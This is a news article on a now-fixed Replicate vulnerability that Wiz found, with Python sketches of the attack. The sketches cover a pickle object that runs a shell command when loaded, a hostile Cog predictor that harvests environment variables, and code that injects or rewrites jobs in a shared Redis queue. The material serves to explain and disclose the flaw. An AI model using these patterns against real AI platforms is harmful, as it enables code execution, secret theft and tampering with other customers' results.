Researchers Discover a Flaw in the Replicate AI Service That Could Have Exposed Customers’ Data and Models

Cybersecurity researchers have discovered a critical security vulnerability in Replicate, an artificial intelligence (AI)-as-a-service provider, that could have allowed threat actors to gain access to customers’ private AI models and sensitive data.

Cloud security company Wiz said in a report published this week that “exploitation of this vulnerability would have allowed unauthorized access to the AI prompts and results of all Replicate’s platform customers.”

The problem stems from the fact that AI models are commonly packaged in formats that allow arbitrary code execution, which an attacker could weaponize through a malicious model to carry out cross-tenant attacks.
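The article does not name a specific serialization format, but Python’s pickle, which many model formats build on, is a common illustration of the risk: simply loading a pickled object can run attacker-controlled code. The snippet below is a minimal sketch of that behavior, not Replicate’s packaging or Wiz’s actual payload.

```python
import os
import pickle


class MaliciousModel:
    """Looks like a model object, but runs code when unpickled."""

    def __reduce__(self):
        # pickle calls __reduce__ to decide how to rebuild the object;
        # returning (callable, args) means "call this function on load".
        return (os.system, ("echo code executed during model load",))


# An attacker ships this blob as a "model weights" file.
payload = pickle.dumps(MaliciousModel())

# Any service that naively loads untrusted model files triggers the command.
pickle.loads(payload)
```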

Replicate containerizes and packages machine learning models using an open-source tool called Cog. These containers can then be deployed in a self-hosted environment or on Replicate’s platform.
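For context, a Cog model pairs a cog.yaml build file with a Python predictor class that Cog wraps in a container. The sketch below shows the general shape of such a predictor; the model behavior and field names are illustrative and not taken from the Wiz write-up.

```python
# predict.py -- a minimal Cog predictor (illustrative only).
# cog.yaml would reference it with a line such as:  predict: "predict.py:Predictor"
from cog import BasePredictor, Input


class Predictor(BasePredictor):
    def setup(self):
        # Runs once when the container starts; normally loads model weights.
        self.greeting = "hello"

    def predict(self, prompt: str = Input(description="Text prompt")) -> str:
        # Runs for every request routed to this model.
        return f"{self.greeting}: {prompt}"
```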

According to Wiz, it created a rogue Cog container and uploaded it to Replicate, ultimately using it to achieve remote code execution with elevated privileges on the service’s infrastructure.
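Wiz has not published its exploit, but the enabling detail is that setup() and predict() are arbitrary Python that the hosting infrastructure executes. A hostile predictor along the following hypothetical lines would run attacker-chosen code inside that environment; the specific reconnaissance steps here are invented for illustration.

```python
# predict.py -- hypothetical hostile predictor; any code here executes on the
# infrastructure that builds and serves the container.
import os
import socket

from cog import BasePredictor, Input


class Predictor(BasePredictor):
    def setup(self):
        # Instead of loading weights, probe the environment the container
        # runs in (environment variables, hostname, reachable services, etc.).
        self.env_dump = dict(os.environ)
        self.hostname = socket.gethostname()

    def predict(self, prompt: str = Input(description="Ignored")) -> str:
        # Leak what was gathered through the normal prediction output channel.
        return f"{self.hostname}: {len(self.env_dump)} environment variables collected"
```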

Security researchers Shir Tamari and Sagi Tzadik said, “We suspect this code-execution technique is a pattern, where companies and organizations run AI models from untrusted sources, even though these models are code that could potentially be malicious.”

The attack technique then leveraged an already-established TCP connection to inject arbitrary commands into a Redis server instance running inside a Kubernetes cluster hosted on the Google Cloud Platform.
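The detail that makes this kind of injection possible is that Redis speaks a plain-text wire protocol (RESP), so anyone who can write raw bytes onto an already-authenticated connection can append further commands. The sketch below only shows how a Redis command is framed on the wire, against a local test instance; it does not reproduce the connection-hijacking step, and the queue key is hypothetical.

```python
import socket


def resp_encode(*args: str) -> bytes:
    """Frame a Redis command in the RESP wire format."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        data = arg.encode()
        out.append(f"${len(data)}\r\n".encode() + data + b"\r\n")
    return b"".join(out)


# Assumes a Redis instance listening locally on the default port.
with socket.create_connection(("127.0.0.1", 6379)) as sock:
    # Once you can write to the socket, any command can be appended --
    # here a job-like payload is pushed onto a (hypothetical) queue key.
    sock.sendall(resp_encode("LPUSH", "jobs:queue", '{"job": "injected"}'))
    print(sock.recv(1024))  # e.g. b":1\r\n" -- the new length of the list
```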

Furthermore, because the centralized Redis server acts as a queue that manages multiple customers’ requests and their responses, it could be abused to facilitate cross-tenant attacks: by tampering with the queueing process to insert rogue jobs, an attacker could alter the results returned for other customers’ models.
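To make the cross-tenant angle concrete, the following hedged sketch uses the redis-py client to show what tampering with a shared work queue could look like in principle; the key names and job format are invented for illustration and do not come from the Wiz report.

```python
import json

import redis  # third-party client: pip install redis

# Assumes a reachable Redis instance; in the incident described above this was
# an internal server shared by all tenants' prediction jobs.
r = redis.Redis(host="127.0.0.1", port=6379, decode_responses=True)

QUEUE = "prediction:jobs"  # hypothetical queue key

# A legitimate tenant enqueues a job...
r.lpush(QUEUE, json.dumps({"tenant": "victim", "prompt": "summarize my data"}))

# ...and an attacker with access to the same Redis can rewrite it in place,
# changing which prompt is processed or what result gets returned.
jobs = r.lrange(QUEUE, 0, -1)
for i, raw in enumerate(jobs):
    job = json.loads(raw)
    if job.get("tenant") == "victim":
        job["prompt"] = "return attacker-chosen output"
        r.lset(QUEUE, i, json.dumps(job))
```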

Such rogue alterations not only endanger the integrity of the AI models but also threaten the accuracy and reliability of AI-driven outputs.

“An attacker could have queried the private AI models of customers, potentially exposing proprietary knowledge or sensitive data involved in the model training process,” the researchers said. “Additionally, intercepting prompts could have exposed sensitive data, including personally identifiable information (PII).”

The issue was responsibly disclosed in January 2024 and has since been addressed by Replicate. There is no evidence that the vulnerability was exploited in the wild to compromise customer data.

The disclosure comes a little over a month after Wiz detailed now-patched vulnerabilities in platforms such as Hugging Face that could allow threat actors to escalate privileges, gain cross-tenant access to other customers’ models, and take over continuous integration and continuous deployment (CI/CD) pipelines.

“Malicious models represent a major risk to AI systems, especially for AI-as-a-service providers because attackers may leverage these models to perform cross-tenant attacks,” the researchers noted.

“The potential impact is devastating, as attackers may be able to access the millions of private AI models and apps stored within AI-as-a-service providers.”

